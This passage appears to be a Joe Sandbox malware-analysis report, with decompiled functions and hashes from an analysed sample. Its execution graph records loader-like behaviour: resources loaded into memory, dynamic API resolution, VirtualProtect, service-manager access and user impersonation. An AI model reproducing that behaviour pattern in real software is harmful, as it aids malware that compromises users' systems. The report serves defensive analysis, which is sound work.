                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 10776b1ed410cf5c27dcf75cc08e41ae2dc3ebf2025a3cf059468a62d91ecbca
                                                                        • Instruction ID: 2b05cc8a934468676b41946179a847013ee7fc241bf6d9ce6a14678ee254fd61
                                                                        • Opcode Fuzzy Hash: 10776b1ed410cf5c27dcf75cc08e41ae2dc3ebf2025a3cf059468a62d91ecbca
                                                                        • Instruction Fuzzy Hash: 4D01A772D00218BBDB309BA75C4DEEB767CEBC5B30F100229FD05E2284D660C640EAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00F36517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xf39a3c; // 0xf30000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00F344B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}







                                                                        0x00f3651f
                                                                        0x00f3652a
                                                                        0x00f36534
                                                                        0x00f3656b
                                                                        0x00f36577
                                                                        0x00f3657c
                                                                        0x00f36536
                                                                        0x00f3653e
                                                                        0x00f36542
                                                                        0x00000000
                                                                        0x00f36544
                                                                        0x00f36547
                                                                        0x00f3654c
                                                                        0x00f36549
                                                                        0x00f36549
                                                                        0x00f36549
                                                                        0x00f3655e
                                                                        0x00f36560
                                                                        0x00f36569
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f36569
                                                                        0x00f36542
                                                                        0x00f36587

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                        • LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                        • DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: 70cbcb3dce53e3a48ce015947070059e4e1d1f4ac0f98c1c4157170815ba0d2d
                                                                        • Instruction ID: 77055c574a9a12f880893593bf2fdf9799ea3eab9ad7accc5394539a52833eab
                                                                        • Opcode Fuzzy Hash: 70cbcb3dce53e3a48ce015947070059e4e1d1f4ac0f98c1c4157170815ba0d2d
                                                                        • Instruction Fuzzy Hash: BD014972500609BBCB106F6A9C48DBB7A6DEB85370F044139FE50D3150D771DC10FAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00F365E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}









                                                                        0x00f365e8
                                                                        0x00f365ed
                                                                        0x00f365ef
                                                                        0x00f365f2
                                                                        0x00f365f4
                                                                        0x00f365f4
                                                                        0x00f365f6
                                                                        0x00f365f7
                                                                        0x00f36608
                                                                        0x00f36611
                                                                        0x00f36618
                                                                        0x00f3661c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3660e
                                                                        0x00f36623
                                                                        0x00f36625
                                                                        0x00f3663b
                                                                        0x00f3663b
                                                                        0x00f3663d
                                                                        0x00f36641
                                                                        0x00f36610
                                                                        0x00f36610
                                                                        0x00000000
                                                                        0x00f36610
                                                                        0x00f36644
                                                                        0x00f36647
                                                                        0x00f36647
                                                                        0x00f36621
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F32B33), ref: 00F36602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F36612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F36629
                                                                        • CharNextA.USER32(00000000), ref: 00F36635
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 77a3c78685b46c9e466b52ff5268a1340985e26a9878aa9ec0b58eb506f45187
                                                                        • Instruction ID: a08cab2ceea7815c4743fe4c2e1902cb08dd6c07819ac858f136f06225e0f73a
                                                                        • Opcode Fuzzy Hash: 77a3c78685b46c9e466b52ff5268a1340985e26a9878aa9ec0b58eb506f45187
                                                                        • Instruction Fuzzy Hash: 85F028328041507EE7322B298C88DBBBF9DCF973B5F2941AFE4D2C6111D6150D06BA71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F369B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xf381f8 = E00F36C70();
                                                                        				__set_app_type(E00F36FBE(2));
                                                                        				 *0xf388a4 =  *0xf388a4 | 0xffffffff;
                                                                        				 *0xf388a8 =  *0xf388a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xf38528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xf3851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00F37000();
                                                                        				if( *0xf38000 == 0) {
                                                                        					__setusermatherr(E00F37000);
                                                                        				}
                                                                        				E00F371EF(_t6);
                                                                        				return 0;
                                                                        			}








                                                                        0x00f369b7
                                                                        0x00f369c2
                                                                        0x00f369c8
                                                                        0x00f369cf
                                                                        0x00f369d8
                                                                        0x00f369de
                                                                        0x00f369e4
                                                                        0x00f369e6
                                                                        0x00f369ec
                                                                        0x00f369f2
                                                                        0x00f369f4
                                                                        0x00f36a00
                                                                        0x00f36a07
                                                                        0x00f36a0d
                                                                        0x00f36a0e
                                                                        0x00f36a15

                                                                        APIs
                                                                          • Part of subcall function 00F36FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F36FC5
                                                                        • __set_app_type.MSVCRT ref: 00F369C2
                                                                        • __p__fmode.MSVCRT ref: 00F369D8
                                                                        • __p__commode.MSVCRT ref: 00F369E6
                                                                        • __setusermatherr.MSVCRT ref: 00F36A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: e3714371b7ab2a2906a2a4c7a73153b595fd23428e10943dde560f4a80f67eb4
                                                                        • Instruction ID: b248c2d8637bb875653f254506dde5d28d245a3a650b338f51315d8fdf014d0d
                                                                        • Opcode Fuzzy Hash: e3714371b7ab2a2906a2a4c7a73153b595fd23428e10943dde560f4a80f67eb4
                                                                        • Instruction Fuzzy Hash: D8F0F8B05093099FC768AB30AE0A6093B62FB04371F104609F4A1862F1CF7ED542BA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:5.6%
                                                                        Dynamic/Decrypted Code Coverage:7.8%
                                                                        Signature Coverage:4.6%
                                                                        Total number of Nodes:1249
                                                                        Total number of Limit Nodes:48
                                                                        execution_graph 13624 2529350 13625 2529390 FindCloseChangeNotification 13624->13625 13627 25293c1 13625->13627 13628 2520980 13630 2520989 13628->13630 13631 2524a25 13628->13631 13634 25290d0 13631->13634 13636 25290e3 13634->13636 13638 2529180 13636->13638 13639 25291c8 VirtualProtect 13638->13639 13641 2524a47 13639->13641 13642 2529920 13643 252996b OpenSCManagerW 13642->13643 13645 25299b4 13643->13645 13646 2529ed8 13647 2529f19 ImpersonateLoggedOnUser 13646->13647 13648 2529f46 13647->13648 13652 25299e8 13654 2529a3d OpenServiceA 13652->13654 13655 2529ad4 13654->13655 13656 40cbdd 13657 40cbe9 _doexit 13656->13657 13691 40d534 HeapCreate 13657->13691 13662 40cc46 13693 41087e GetModuleHandleW 13662->13693 13664 40cc57 __RTC_Initialize 13727 411a15 13664->13727 13665 40cbb4 _fast_error_exit 63 API calls 13665->13664 13667 40cc66 13668 40cc72 GetCommandLineA 13667->13668 13864 40e79a 13667->13864 13742 412892 13668->13742 13675 40cc97 13778 41255f 13675->13778 13676 40e79a __amsg_exit 63 API calls 13676->13675 13679 40cca8 13793 40e859 13679->13793 13680 40e79a __amsg_exit 63 API calls 13680->13679 13682 40ccb0 13683 40ccbb 13682->13683 13684 40e79a __amsg_exit 63 API calls 13682->13684 13799 4019f0 OleInitialize 13683->13799 13684->13683 13686 40ccd8 13687 40ccea 13686->13687 13853 40ea0a 13686->13853 13871 40ea36 13687->13871 13690 40ccef _doexit 13692 40cc3a 13691->13692 13692->13662 13856 40cbb4 13692->13856 13694 410892 13693->13694 13695 410899 13693->13695 13874 40e76a 13694->13874 13697 410a01 13695->13697 13698 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13695->13698 13933 410598 13697->13933 13700 4108ec TlsAlloc 13698->13700 13703 40cc4c 13700->13703 13704 41093a TlsSetValue 13700->13704 13703->13664 13703->13665 13704->13703 13705 41094b 13704->13705 13878 40ea54 13705->13878 13710 41046e __encode_pointer 6 API calls 13711 41096b 13710->13711 13712 41046e __encode_pointer 6 API calls 13711->13712 13713 41097b 13712->13713 13714 41046e __encode_pointer 6 API calls 13713->13714 13715 41098b 13714->13715 13895 40d564 13715->13895 13722 4104e9 __decode_pointer 6 API calls 13723 4109df 13722->13723 13723->13697 13724 4109e6 13723->13724 13915 4105d5 13724->13915 13726 4109ee GetCurrentThreadId 13726->13703 14240 40e1d8 13727->14240 13729 411a21 GetStartupInfoA 13730 411cba __calloc_crt 63 API calls 13729->13730 13736 411a42 13730->13736 13731 411c60 _doexit 13731->13667 13732 411bdd GetStdHandle 13741 411ba7 13732->13741 13733 411c42 SetHandleCount 13733->13731 13734 411cba __calloc_crt 63 API calls 13734->13736 13735 411bef GetFileType 13735->13741 13736->13731 13736->13734 13738 411b2a 13736->13738 13736->13741 13737 411b53 GetFileType 13737->13738 13738->13731 13738->13737 13740 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 13738->13740 13738->13741 13739 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 13739->13741 13740->13738 13741->13731 13741->13732 13741->13733 13741->13735 13741->13739 13743 4128b0 GetEnvironmentStringsW 13742->13743 13744 4128cf 13742->13744 13745 4128b8 13743->13745 13747 4128c4 GetLastError 13743->13747 13744->13745 13746 412968 13744->13746 13748 4128eb GetEnvironmentStringsW 13745->13748 13752 4128fa 13745->13752 13749 412971 GetEnvironmentStrings 13746->13749 13750 40cc82 13746->13750 13747->13744 13748->13750 13748->13752 13749->13750 13751 412981 13749->13751 13767 4127d7 13750->13767 13756 411c75 __malloc_crt 63 API calls 13751->13756 13752->13752 13753 41290f WideCharToMultiByte 13752->13753 13754 41295d FreeEnvironmentStringsW 13753->13754 13755 41292e 13753->13755 13754->13750 13757 411c75 __malloc_crt 63 API calls 13755->13757 13758 41299b 13756->13758 13759 412934 13757->13759 13760 4129a2 FreeEnvironmentStringsA 13758->13760 13761 4129ae _memcpy_s 13758->13761 13759->13754 13762 41293c WideCharToMultiByte 13759->13762 13760->13750 13765 4129b8 FreeEnvironmentStringsA 13761->13765 13763 412956 13762->13763 13764 41294e 13762->13764 13763->13754 13766 40b6b5 ___endstdio 63 API calls 13764->13766 13765->13750 13766->13763 13768 4127f1 GetModuleFileNameA 13767->13768 13769 4127ec 13767->13769 13771 412818 13768->13771 14247 41446b 13769->14247 14241 41263d 13771->14241 13773 40cc8c 13773->13675 13773->13676 13775 411c75 __malloc_crt 63 API calls 13776 41285a 13775->13776 13776->13773 13777 41263d _parse_cmdline 73 API calls 13776->13777 13777->13773 13779 412568 13778->13779 13783 41256d _strlen 13778->13783 13780 41446b ___initmbctable 107 API calls 13779->13780 13780->13783 13781 40cc9d 13781->13679 13781->13680 13782 411cba __calloc_crt 63 API calls 13788 4125a2 _strlen 13782->13788 13783->13781 13783->13782 13784 412600 13785 40b6b5 ___endstdio 63 API calls 13784->13785 13785->13781 13786 411cba __calloc_crt 63 API calls 13786->13788 13787 412626 13789 40b6b5 ___endstdio 63 API calls 13787->13789 13788->13781 13788->13784 13788->13786 13788->13787 13790 40ef42 _strcpy_s 63 API calls 13788->13790 13791 4125e7 13788->13791 13789->13781 13790->13788 13791->13788 13792 40e61c __invoke_watson 10 API calls 13791->13792 13792->13791 13794 40e867 __IsNonwritableInCurrentImage 13793->13794 14658 413586 13794->14658 13796 40e885 __initterm_e 13798 40e8a4 __IsNonwritableInCurrentImage __initterm 13796->13798 14662 40d2bd 13796->14662 13798->13682 13800 401ab9 13799->13800 14762 40b99e 13800->14762 13802 401abf 13803 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 13802->13803 13829 402467 13802->13829 13804 401dc3 FindCloseChangeNotification GetModuleHandleA 13803->13804 13810 401c55 13803->13810 14775 401650 13804->14775 13806 401e8b FindResourceA LoadResource LockResource SizeofResource 13807 40b84d _malloc 63 API calls 13806->13807 13808 401ebf 13807->13808 14777 40af66 13808->14777 13811 401c9c CloseHandle 13810->13811 13816 401cf9 Module32Next 13810->13816 13811->13686 13812 401ecb _memset 13813 401efc SizeofResource 13812->13813 13814 401f1c 13813->13814 13815 401f5f 13813->13815 13814->13815 14815 401560 13814->14815 13818 401f92 _memset 13815->13818 13819 401560 __VEC_memcpy 13815->13819 13816->13804 13825 401d0f 13816->13825 13820 401fa2 FreeResource 13818->13820 13819->13818 13821 40b84d _malloc 63 API calls 13820->13821 13822 401fbb SizeofResource 13821->13822 13823 401fe5 _memset 13822->13823 13824 4020aa LoadLibraryA 13823->13824 13826 401650 13824->13826 13825->13811 13828 401dad Module32Next 13825->13828 13827 40216c GetProcAddress 13826->13827 13827->13829 13830 4021aa 13827->13830 13828->13804 13828->13825 13829->13686 13830->13829 14789 4018f0 13830->14789 13832 40243f 13832->13829 13833 40b6b5 ___endstdio 63 API calls 13832->13833 13833->13829 13834 4021f1 13834->13832 14801 401870 13834->14801 13836 402269 VariantInit 13837 401870 76 API calls 13836->13837 13838 40228b VariantInit 13837->13838 13839 4022a7 13838->13839 13840 4022d9 SafeArrayCreate SafeArrayAccessData 13839->13840 14806 40b350 13840->14806 13843 40232c 13844 402354 SafeArrayDestroy 13843->13844 13852 40235b 13843->13852 13844->13852 13845 402392 SafeArrayCreateVector 13846 4023a4 13845->13846 13847 4023bc VariantClear VariantClear 13846->13847 14808 4019a0 13847->14808 13850 40242e 13851 4019a0 66 API calls 13850->13851 13851->13832 13852->13845 15072 40e8de 13853->15072 13855 40ea1b 13855->13687 13857 40cbc2 13856->13857 13858 40cbc7 13856->13858 13859 40ec4d __FF_MSGBANNER 63 API calls 13857->13859 13860 40eaa2 __NMSG_WRITE 63 API calls 13858->13860 13859->13858 13861 40cbcf 13860->13861 13862 40e7ee _doexit 4 API calls 13861->13862 13863 40cbd9 13862->13863 13863->13662 13865 40ec4d __FF_MSGBANNER 63 API calls 13864->13865 13866 40e7a4 13865->13866 13867 40eaa2 __NMSG_WRITE 63 API calls 13866->13867 13868 40e7ac 13867->13868 13869 4104e9 __decode_pointer 6 API calls 13868->13869 13870 40cc71 13869->13870 13870->13668 13872 40e8de _doexit 63 API calls 13871->13872 13873 40ea41 13872->13873 13873->13690 13875 40e775 Sleep GetModuleHandleW 13874->13875 13876 40e793 13875->13876 13877 40e797 13875->13877 13876->13875 13876->13877 13877->13695 13939 4104e0 13878->13939 13880 40ea5c __init_pointers __initp_misc_winsig 13942 41393d 13880->13942 13883 41046e __encode_pointer 6 API calls 13884 40ea98 13883->13884 13885 41046e TlsGetValue 13884->13885 13886 4104a7 GetModuleHandleW 13885->13886 13887 410486 13885->13887 13889 4104c2 GetProcAddress 13886->13889 13890 4104b7 13886->13890 13887->13886 13888 410490 TlsGetValue 13887->13888 13893 41049b 13888->13893 13891 41049f 13889->13891 13892 40e76a __crt_waiting_on_module_handle 2 API calls 13890->13892 13891->13710 13894 4104bd 13892->13894 13893->13886 13893->13891 13894->13889 13894->13891 13896 40d56f 13895->13896 13898 40d59d 13896->13898 13945 41389c 13896->13945 13898->13697 13899 4104e9 TlsGetValue 13898->13899 13900 410501 13899->13900 13901 410522 GetModuleHandleW 13899->13901 13900->13901 13902 41050b TlsGetValue 13900->13902 13903 410532 13901->13903 13904 41053d GetProcAddress 13901->13904 13906 410516 13902->13906 13905 40e76a __crt_waiting_on_module_handle 2 API calls 13903->13905 13908 41051a 13904->13908 13907 410538 13905->13907 13906->13901 13906->13908 13907->13904 13907->13908 13908->13697 13909 411cba 13908->13909 13912 411cc3 13909->13912 13911 4109c5 13911->13697 13911->13722 13912->13911 13913 411ce1 Sleep 13912->13913 13950 40e231 13912->13950 13914 411cf6 13913->13914 13914->13911 13914->13912 14219 40e1d8 13915->14219 13917 4105e1 GetModuleHandleW 13918 4105f1 13917->13918 13919 4105f7 13917->13919 13920 40e76a __crt_waiting_on_module_handle 2 API calls 13918->13920 13921 410633 13919->13921 13922 41060f GetProcAddress GetProcAddress 13919->13922 13920->13919 13923 40d6e0 __lock 59 API calls 13921->13923 13922->13921 13924 410652 InterlockedIncrement 13923->13924 14220 4106aa 13924->14220 13927 40d6e0 __lock 59 API calls 13928 410673 13927->13928 14223 4145d2 InterlockedIncrement 13928->14223 13930 410691 14235 4106b3 13930->14235 13932 41069e _doexit 13932->13726 13934 4105a2 13933->13934 13935 4105ae 13933->13935 13936 4104e9 __decode_pointer 6 API calls 13934->13936 13937 4105d0 13935->13937 13938 4105c2 TlsFree 13935->13938 13936->13935 13937->13937 13938->13937 13940 41046e __encode_pointer 6 API calls 13939->13940 13941 4104e7 13940->13941 13941->13880 13943 41046e __encode_pointer 6 API calls 13942->13943 13944 40ea8e 13943->13944 13944->13883 13949 40e1d8 13945->13949 13947 4138a8 InitializeCriticalSectionAndSpinCount 13948 4138ec _doexit 13947->13948 13948->13896 13949->13947 13951 40e23d _doexit 13950->13951 13952 40e255 13951->13952 13960 40e274 _memset 13951->13960 13963 40bfc1 13952->13963 13955 40e2e6 RtlAllocateHeap 13955->13960 13959 40e26a _doexit 13959->13912 13960->13955 13960->13959 13969 40d6e0 13960->13969 13976 40def2 13960->13976 13982 40e32d 13960->13982 13985 40d2e3 13960->13985 13988 4106bc GetLastError 13963->13988 13965 40bfc6 13966 40e744 13965->13966 13967 4104e9 __decode_pointer 6 API calls 13966->13967 13968 40e754 __invoke_watson 13967->13968 13970 40d6f5 13969->13970 13971 40d708 EnterCriticalSection 13969->13971 14013 40d61d 13970->14013 13971->13960 13973 40d6fb 13973->13971 13974 40e79a __amsg_exit 62 API calls 13973->13974 13975 40d707 13974->13975 13975->13971 13977 40df20 13976->13977 13978 40dfb9 13977->13978 13980 40dfc2 13977->13980 14207 40da59 13977->14207 13978->13980 14214 40db09 13978->14214 13980->13960 14218 40d606 LeaveCriticalSection 13982->14218 13984 40e334 13984->13960 13986 4104e9 __decode_pointer 6 API calls 13985->13986 13987 40d2f3 13986->13987 13987->13960 14002 410564 TlsGetValue 13988->14002 13991 410729 SetLastError 13991->13965 13992 411cba __calloc_crt 60 API calls 13993 4106e7 13992->13993 13993->13991 13994 4104e9 __decode_pointer 6 API calls 13993->13994 13995 410701 13994->13995 13996 410720 13995->13996 13997 410708 13995->13997 14007 40b6b5 13996->14007 13998 4105d5 __initptd 60 API calls 13997->13998 14000 410710 GetCurrentThreadId 13998->14000 14000->13991 14001 410726 14001->13991 14003 410594 14002->14003 14004 410579 14002->14004 14003->13991 14003->13992 14005 4104e9 __decode_pointer 6 API calls 14004->14005 14006 410584 TlsSetValue 14005->14006 14006->14003 14008 40b6c1 _doexit 14007->14008 14009 40b714 HeapFree 14008->14009 14010 40b73d _doexit 14008->14010 14009->14010 14011 40b727 14009->14011 14010->14001 14012 40bfc1 __flsbuf 62 API calls 14011->14012 14012->14010 14014 40d629 _doexit 14013->14014 14015 40d64f 14014->14015 14039 40ec4d 14014->14039 14023 40d65f _doexit 14015->14023 14085 411c75 14015->14085 14021 40d680 14026 40d6e0 __lock 63 API calls 14021->14026 14022 40d671 14025 40bfc1 __flsbuf 63 API calls 14022->14025 14023->13973 14025->14023 14028 40d687 14026->14028 14029 40d6bb 14028->14029 14030 40d68f 14028->14030 14031 40b6b5 ___endstdio 63 API calls 14029->14031 14032 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 14030->14032 14038 40d6ac 14031->14038 14033 40d69a 14032->14033 14035 40b6b5 ___endstdio 63 API calls 14033->14035 14033->14038 14036 40d6a6 14035->14036 14037 40bfc1 __flsbuf 63 API calls 14036->14037 14037->14038 14091 40d6d7 14038->14091 14094 413d5b 14039->14094 14042 40ec61 14044 40eaa2 __NMSG_WRITE 63 API calls 14042->14044 14047 40d63e 14042->14047 14043 413d5b __set_error_mode 63 API calls 14043->14042 14045 40ec79 14044->14045 14046 40eaa2 __NMSG_WRITE 63 API calls 14045->14046 14046->14047 14048 40eaa2 14047->14048 14049 40eab6 14048->14049 14050 413d5b __set_error_mode 60 API calls 14049->14050 14081 40d645 14049->14081 14051 40ead8 14050->14051 14052 40ec16 GetStdHandle 14051->14052 14054 413d5b __set_error_mode 60 API calls 14051->14054 14053 40ec24 _strlen 14052->14053 14052->14081 14057 40ec3d WriteFile 14053->14057 14053->14081 14055 40eae9 14054->14055 14055->14052 14056 40eafb 14055->14056 14056->14081 14100 40ef42 14056->14100 14057->14081 14060 40eb31 GetModuleFileNameA 14061 40eb4f 14060->14061 14066 40eb72 _strlen 14060->14066 14064 40ef42 _strcpy_s 60 API calls 14061->14064 14065 40eb5f 14064->14065 14065->14066 14068 40e61c __invoke_watson 10 API calls 14065->14068 14067 40ebb5 14066->14067 14116 411da6 14066->14116 14125 413ce7 14067->14125 14068->14066 14072 40ebd9 14075 413ce7 _strcat_s 60 API calls 14072->14075 14074 40e61c __invoke_watson 10 API calls 14074->14072 14077 40ebed 14075->14077 14076 40e61c __invoke_watson 10 API calls 14076->14067 14078 40ebfe 14077->14078 14080 40e61c __invoke_watson 10 API calls 14077->14080 14134 413b7e 14078->14134 14080->14078 14082 40e7ee 14081->14082 14172 40e7c3 GetModuleHandleW 14082->14172 14087 411c7e 14085->14087 14088 40d66a 14087->14088 14089 411c95 Sleep 14087->14089 14176 40b84d 14087->14176 14088->14021 14088->14022 14090 411caa 14089->14090 14090->14087 14090->14088 14206 40d606 LeaveCriticalSection 14091->14206 14093 40d6de 14093->14023 14095 413d6a 14094->14095 14096 40ec54 14095->14096 14097 40bfc1 __flsbuf 63 API calls 14095->14097 14096->14042 14096->14043 14098 413d8d 14097->14098 14099 40e744 __msize 6 API calls 14098->14099 14099->14096 14101 40ef53 14100->14101 14102 40ef5a 14100->14102 14101->14102 14105 40ef80 14101->14105 14103 40bfc1 __flsbuf 63 API calls 14102->14103 14108 40ef5f 14103->14108 14104 40e744 __msize 6 API calls 14106 40eb1d 14104->14106 14105->14106 14107 40bfc1 __flsbuf 63 API calls 14105->14107 14106->14060 14109 40e61c 14106->14109 14107->14108 14108->14104 14161 40ba30 14109->14161 14111 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14112 40e725 GetCurrentProcess TerminateProcess 14111->14112 14113 40e719 __invoke_watson 14111->14113 14163 40ce09 14112->14163 14113->14112 14115 40e742 14115->14060 14120 411db8 14116->14120 14117 411dbc 14118 40eba2 14117->14118 14119 40bfc1 __flsbuf 63 API calls 14117->14119 14118->14067 14118->14076 14121 411dd8 14119->14121 14120->14117 14120->14118 14123 411e02 14120->14123 14122 40e744 __msize 6 API calls 14121->14122 14122->14118 14123->14118 14124 40bfc1 __flsbuf 63 API calls 14123->14124 14124->14121 14126 413cff 14125->14126 14128 413cf8 14125->14128 14127 40bfc1 __flsbuf 63 API calls 14126->14127 14133 413d04 14127->14133 14128->14126 14131 413d33 14128->14131 14129 40e744 __msize 6 API calls 14130 40ebc8 14129->14130 14130->14072 14130->14074 14131->14130 14132 40bfc1 __flsbuf 63 API calls 14131->14132 14132->14133 14133->14129 14135 4104e0 _doexit 6 API calls 14134->14135 14136 413b8e 14135->14136 14137 413ba1 LoadLibraryA 14136->14137 14140 413c29 14136->14140 14138 413ccb 14137->14138 14139 413bb6 GetProcAddress 14137->14139 14138->14081 14139->14138 14141 413bcc 14139->14141 14144 4104e9 __decode_pointer 6 API calls 14140->14144 14152 413c53 14140->14152 14145 41046e __encode_pointer 6 API calls 14141->14145 14142 4104e9 __decode_pointer 6 API calls 14142->14138 14143 4104e9 __decode_pointer 6 API calls 14154 413c96 14143->14154 14146 413c46 14144->14146 14147 413bd2 GetProcAddress 14145->14147 14148 4104e9 __decode_pointer 6 API calls 14146->14148 14149 41046e __encode_pointer 6 API calls 14147->14149 14148->14152 14150 413be7 GetProcAddress 14149->14150 14151 41046e __encode_pointer 6 API calls 14150->14151 14153 413bfc GetProcAddress 14151->14153 14152->14143 14160 413c7e 14152->14160 14155 41046e __encode_pointer 6 API calls 14153->14155 14157 4104e9 __decode_pointer 6 API calls 14154->14157 14154->14160 14156 413c11 14155->14156 14156->14140 14158 413c1b GetProcAddress 14156->14158 14157->14160 14159 41046e __encode_pointer 6 API calls 14158->14159 14159->14140 14160->14142 14162 40ba3c __VEC_memzero 14161->14162 14162->14111 14164 40ce11 14163->14164 14165 